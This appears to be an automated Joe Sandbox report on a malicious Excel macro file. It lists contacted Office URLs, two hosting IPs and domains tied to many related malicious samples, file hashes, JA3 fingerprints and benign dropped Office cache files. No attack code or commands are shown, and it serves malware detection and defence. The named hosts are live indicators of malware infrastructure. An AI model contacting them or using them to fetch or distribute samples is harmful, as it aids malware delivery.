                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                              high
                                                                                                              https://outlook.office.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                high
                                                                                                                https://storage.live.com/clientlogs/uploadlocationD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                  high
                                                                                                                  https://templatelogging.office.com/client/logD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                          high
                                                                                                                          https://management.azure.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                            high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://graph.windows.net/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                high
                                                                                                                                https://api.powerbi.com/beta/myorg/importsD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://devnull.onenote.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://ncus.pagecontentsync.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    unknown
                                                                                                                                    https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://messaging.office.com/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://augloop.office.com/v2D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://skyapi.live.net/Activity/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://clients.config.office.net/user/v1.0/macD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.o365filtering.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://api.cortana.aiD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://onedrive.live.comD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://ovisualuiapp.azurewebsites.net/pbiagave/D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                  • 0%, Virustotal, Browse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://visio.uservoice.com/forums/368202-visio-on-devicesD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://directory.services.D1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://login.windows-ppe.net/common/oauth2/authorizeD1505509-3A71-4C04-B572-82F28F0AAB3F.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      192.185.5.2
                                                                                                                                                      anaheimdermatologists.comUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse
                                                                                                                                                      192.254.233.89
                                                                                                                                                      industrialarttextile.comUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                      Analysis ID:403877
                                                                                                                                                      Start date:04.05.2021
                                                                                                                                                      Start time:13:47:15
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 5m 34s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:statistic-2070252624.xlsm
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal84.troj.expl.evad.winXLSM@5/14@2/2
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xlsm
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      192.185.5.2statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                        statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                          statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                            statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                              statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                  catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                    catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          f.xlsmGet hashmaliciousBrowse
                                                                                                                                                                            f.xlsmGet hashmaliciousBrowse
                                                                                                                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                  14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            diagram-1732659868.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              192.254.233.89statistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                  statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                    statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                        statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                          statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                            statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                              statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                    14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                      industrialarttextile.comstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      anaheimdermatologists.comstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-1048881972.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      statistic-118970052.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      14e9289c_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2

                                                                                                                                                                                                                      ASN

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                      UNIFIEDLAYER-AS-1USstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                                                      ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.185.244
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.249.219
                                                                                                                                                                                                                      presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.249.219
                                                                                                                                                                                                                      GK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.21.136
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.20.98
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.20.98
                                                                                                                                                                                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.166.59
                                                                                                                                                                                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 108.179.242.122
                                                                                                                                                                                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 108.179.242.122
                                                                                                                                                                                                                      6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.24.47
                                                                                                                                                                                                                      DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                                                      generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.177.61
                                                                                                                                                                                                                      4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.24.47
                                                                                                                                                                                                                      UNIFIEDLAYER-AS-1USstatistic-2069354685.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2070252624.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      INDIA ORDERD CH2323ED.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                                                      ARIX SRLVl (MN) - Italy.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.185.244
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.249.219
                                                                                                                                                                                                                      presentation.jarGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.249.219
                                                                                                                                                                                                                      GK58.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.21.136
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.20.98
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.20.98
                                                                                                                                                                                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 50.87.166.59
                                                                                                                                                                                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 108.179.242.122
                                                                                                                                                                                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 108.179.242.122
                                                                                                                                                                                                                      6613n246zm543w.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.24.47
                                                                                                                                                                                                                      DEMARG MALAYHCU21345.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.169.22
                                                                                                                                                                                                                      generated check 662732.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.177.61
                                                                                                                                                                                                                      4Y2I7k0.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 162.241.24.47

                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19statistic-2072807337.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      statistic-207394368.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      f97e137e_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      e1df57de_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      MV RED SEA.docxGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      MyUY1HeWNL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      IMG-WA7905432.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      catalog-1521295750.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      Documents_111651917_375818984.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      Tree Top.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      PT6-1152.docGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      s.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      setup-lightshot.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      s.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      8a793b14_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      pic05678063.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89
                                                                                                                                                                                                                      6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                      • 192.185.5.2
                                                                                                                                                                                                                      • 192.254.233.89

                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                      No context

                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D1505509-3A71-4C04-B572-82F28F0AAB3F
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):134558
                                                                                                                                                                                                                      Entropy (8bit):5.3683905157117495
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:ucQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:tEQ9DQW+zPXO8
                                                                                                                                                                                                                      MD5:F84A8D97D3B0194EE8159EDCA93E69A7
                                                                                                                                                                                                                      SHA1:7C720FB7E06341B4638A7B509CE545EE1111C23C
                                                                                                                                                                                                                      SHA-256:D5A495CC92719963F8B6399B5B027FFD87089D84C4A9D9E628EAF775BD94227D
                                                                                                                                                                                                                      SHA-512:3D6FCF182518F344B44ADCE6EA650436D4107664E1A4B6E673AF662BC0317DDAF9E9D09C67C6F3B705A5352250A64658348C4328F0EFED94C4C7156823B405D7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-05-04T11:48:09">.. Build: 16.0.14102.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\10CFADED.png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8301
                                                                                                                                                                                                                      Entropy (8bit):7.970711494690041
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                                                                      MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                                                                      SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                                                                      SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                                                                      SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\128C6383.png
                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):557
                                                                                                                                                                                                                      Entropy (8bit):7.343009301479381
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                                                                      MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                                                                      SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                                                                      SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                                                                      SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                                                                                                      Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
